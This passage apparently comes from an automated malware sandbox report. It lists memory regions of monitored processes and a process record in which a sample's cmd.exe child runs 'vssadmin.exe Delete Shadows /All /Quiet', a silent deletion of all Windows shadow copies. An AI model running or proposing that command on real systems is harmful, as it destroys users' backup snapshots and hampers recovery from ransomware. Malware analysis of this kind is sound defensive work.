| private_0x00000000000c0000 | 0x000c0000 | 0x0013ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000140000 | 0x00140000 | 0x00140fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000150000 | 0x00150000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000190000 | 0x00190000 | 0x001cffff | Private Memory | Readable, Writable |
|
|
|
|
| locale.nls | 0x001d0000 | 0x00236fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000240000 | 0x00240000 | 0x0027ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000002d0000 | 0x002d0000 | 0x003cffff | Private Memory | Readable, Writable |
|
|
|
|
| kernelbase.dll.mui | 0x003d0000 | 0x0048ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x00000000004c0000 | 0x004c0000 | 0x004cffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000004d0000 | 0x004d0000 | 0x00657fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000660000 | 0x00660000 | 0x007e0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000810000 | 0x00810000 | 0x0084ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000850000 | 0x00850000 | 0x0088ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000910000 | 0x00910000 | 0x0094ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000009c0000 | 0x009c0000 | 0x009fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000a00000 | 0x00a00000 | 0x00a3ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000a40000 | 0x00a40000 | 0x00b3ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000b40000 | 0x00b40000 | 0x00b7ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000b90000 | 0x00b90000 | 0x00bcffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000bd0000 | 0x00bd0000 | 0x00c0ffff | Private Memory | Readable, Writable |
|
|
|
|
| taskkill.exe | 0x00d70000 | 0x00d85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000d90000 | 0x00d90000 | 0x0218ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| sortdefault.nls | 0x02190000 | 0x0245efff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000002460000 | 0x02460000 | 0x0249ffff | Private Memory | Readable, Writable |
|
|
|
|
| fastprox.dll | 0x6a570000 | 0x6a605fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dbghelp.dll | 0x6a830000 | 0x6a91afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mpr.dll | 0x73ba0000 | 0x73bb1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x73fd0000 | 0x73fd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x73fe0000 | 0x7403bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74040000 | 0x7407efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x74080000 | 0x74087fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74460000 | 0x7449afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x749d0000 | 0x749ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x749e0000 | 0x749f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| version.dll | 0x74b50000 | 0x74b58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdsapi.dll | 0x74b70000 | 0x74b87fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemsvc.dll | 0x74b90000 | 0x74b9efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winsta.dll | 0x74ba0000 | 0x74bc8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemcomn.dll | 0x74bd0000 | 0x74c2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemprox.dll | 0x74c30000 | 0x74c39fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wkscli.dll | 0x74c40000 | 0x74c4efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netutils.dll | 0x74c50000 | 0x74c58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netapi32.dll | 0x74c60000 | 0x74c70fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x74c80000 | 0x74c8cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| framedynos.dll | 0x74c90000 | 0x74cc4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| srvcli.dll | 0x75330000 | 0x75348fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x753f0000 | 0x753fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75400000 | 0x7545ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x755a0000 | 0x7564bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x763f0000 | 0x7648ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76490000 | 0x76512fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76520000 | 0x7662ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76690000 | 0x7677ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76780000 | 0x767d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x7683ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76910000 | 0x7699efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x769a0000 | 0x769b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x76c80000 | 0x76c85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76c90000 | 0x76d2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76d30000 | 0x76e8bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76ea0000 | 0x76ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x77130000 | 0x77164fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x771f0000 | 0x772bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x772c0000 | 0x77305fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77310000 | 0x7740ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x77410000 | 0x7749ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000774a0000 | 0x774a0000 | 0x77599fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000775a0000 | 0x775a0000 | 0x776befff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x776c0000 | 0x77868fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x778a0000 | 0x77a1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Information | Value |
|---|---|
| ID | #44 |
| File Name | c:\windows\syswow64\vssadmin.exe |
| Command Line | vssadmin.exe Delete Shadows /All /Quiet |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:38, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:57 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0x87c |
| Parent PID | 0xbb0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
6CC
0x
96C
0x
8A8
0x
8B0
0x
8B4
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| vssadmin.exe.mui | 0x000f0000 | 0x000fcfff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000110000 | 0x00110000 | 0x00110fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000120000 | 0x00120000 | 0x00120fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000130000 | 0x00130000 | 0x00130fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000001b0000 | 0x001b0000 | 0x001effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000240000 | 0x00240000 | 0x0027ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000280000 | 0x00280000 | 0x002bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000370000 | 0x00370000 | 0x003effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000410000 | 0x00410000 | 0x0044ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000490000 | 0x00490000 | 0x004cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000004e0000 | 0x004e0000 | 0x005dffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000610000 | 0x00610000 | 0x0064ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000006e0000 | 0x006e0000 | 0x006effff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000006f0000 | 0x006f0000 | 0x00877fff | Pagefile Backed Memory | Readable |
|
|
|
|
| vssadmin.exe | 0x009c0000 | 0x009defff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x00000000009e0000 | 0x009e0000 | 0x00b60fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000b70000 | 0x00b70000 | 0x01f6ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| sortdefault.nls | 0x01f70000 | 0x0223efff | Memory Mapped File | Readable |
|
|
|
|
| wow64cpu.dll | 0x73fd0000 | 0x73fd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x73fe0000 | 0x7403bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74040000 | 0x7407efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74460000 | 0x7449afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x749d0000 | 0x749ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x749e0000 | 0x749f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| vssapi.dll | 0x74b80000 | 0x74c95fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| vsstrace.dll | 0x74ca0000 | 0x74caffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| atl.dll | 0x74cb0000 | 0x74cc3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x753f0000 | 0x753fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75400000 | 0x7545ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x755a0000 | 0x7564bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x763f0000 | 0x7648ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76490000 | 0x76512fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76520000 | 0x7662ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76690000 | 0x7677ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x7683ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76910000 | 0x7699efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x769a0000 | 0x769b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76c90000 | 0x76d2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76d30000 | 0x76e8bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76ea0000 | 0x76ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x771f0000 | 0x772bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x772c0000 | 0x77305fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77310000 | 0x7740ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x77410000 | 0x7749ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000774a0000 | 0x774a0000 | 0x77599fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000775a0000 | 0x775a0000 | 0x776befff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x776c0000 | 0x77868fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x778a0000 | 0x77a1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
